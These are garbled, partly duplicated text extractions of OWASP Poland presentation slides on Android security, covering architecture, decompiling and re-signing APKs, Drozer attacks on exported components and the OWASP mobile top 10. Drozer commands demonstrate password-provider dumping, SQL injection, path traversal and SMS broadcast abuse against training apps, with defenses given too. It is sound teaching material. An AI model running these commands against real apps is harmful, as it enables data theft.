(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
